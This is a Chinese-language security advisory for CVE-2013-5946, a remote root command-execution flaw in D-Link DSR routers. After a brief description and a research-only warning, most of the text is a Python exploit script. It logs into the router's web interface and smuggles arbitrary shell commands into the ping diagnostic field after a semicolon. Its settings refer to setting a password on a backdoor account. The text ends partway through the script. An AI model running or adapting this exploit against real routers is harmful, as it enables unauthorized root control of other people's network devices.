Link DSR路由器远程任意命令执行漏洞(CVE

发布日期：2013-12-03
更新日期：2013-12-13

受影响系统：
D-Link DSR Router DSR-500N
D-Link DSR Router DSR-250N
D-Link DSR Router DSR-150N
D-Link DSR Router DSR-150
D-Link DSR Router DSR-1000N
D-Link DSR Router DSR-1000
D-Link DSR Router D-Link DSR-500
描述：
--------------------------------------------------------------------------------
BUGTRAQ  ID: 64181
CVE(CAN) ID: CVE-2013-5946

D-Link DSR是无线服务路由器产品。

D-Link DSR路由器系列产品在实现上存在远程任意命令执行漏洞，成功利用后可使攻击者以root用户权限执行任意命令。

<*来源：nu11.nu11
  *>

测试方法：
--------------------------------------------------------------------------------

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

#!/usr/bin/Python

import httplib
import urllib
import telnetlib
import time
import sys
import crypt
import random
import string

##############################
#
# CHANGE THESE VALUES -- BEGIN
#
# Your router's IP:PORT
ipaddr = "192.168.10.1:443"
# Password to be set (by this hack) on the backdoor account
bdpasswd = "password"
#
# CHANGE THESE VALUES -- END
#
# persistent config file:    /tmp/teamf1.cfg.ascii
#                            Edit this file to make your changes
persistent.
#
##############################

cookie = ""
pid = -2
bduser = ""
   

def request(m = "", u = "", b = "", h = ""):
    global ipaddr
    conn = httplib.HTTPSConnection(ipaddr, timeout = 15)
    assert m in ["GET", "POST"]
    conn.request(method = m, url = u, body = b, headers = h)
    ret = conn.getresponse()
    header = ret.getheaders()
    data = ret.read()
    conn.close()
    return (header, data)

def login(user, passwd):
    global ipaddr
    headers = {'Accept':
"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
              'User-Agent': "Exploit",
              'Referer': "https://" + ipaddr +
"/scgi-bin/platform.cgi",
              'Content-Type': "application/x-www-form-urlencoded"}
    body = {'thispage'                          : "index.htm",
            'Users.UserName'                    : user,
            'Users.Password'                    : passwd,
            'button.login.Users.deviceStatus'  : "Login",
            'Login.userAgent'                  : "Exploit"}
    return request("POST", "/scgi-bin/platform.cgi",
urllib.urlencode(body), headers)
   
   
def logout():
    global ipaddr, cookie
    headers = {'Accept':
"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
              'User-Agent': "Exploit",
              'Referer': "https://" + ipaddr +
"/scgi-bin/platform.cgi",
              'Content-Type': "application/x-www-form-urlencoded"}
    body = ""
    return request("GET", "/scgi-bin/platform.cgi?page=index.htm",
urllib.urlencode(body), headers)

def execCmd(cmd = None):
    global ipaddr, cookie
    assert cmd != None
    headers = {'Accept':
"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
              'User-Agent': "Exploit",
              'Referer': "https://" + ipaddr +
"/scgi-bin/platform.cgi?page=systemCheck.htm",
              'Cookie': cookie,
              'Content-Type': "application/x-www-form-urlencoded"}
    body = {'thispage'                          : "systemCheck.htm",
            'ping.ip'                          : "localhost;" + cmd,
            'button.traceroute.diagDisplay'    : "Traceroute"}
    return request("POST", "/scgi-bin/platform.cgi",
urllib.urlencode(body), headers)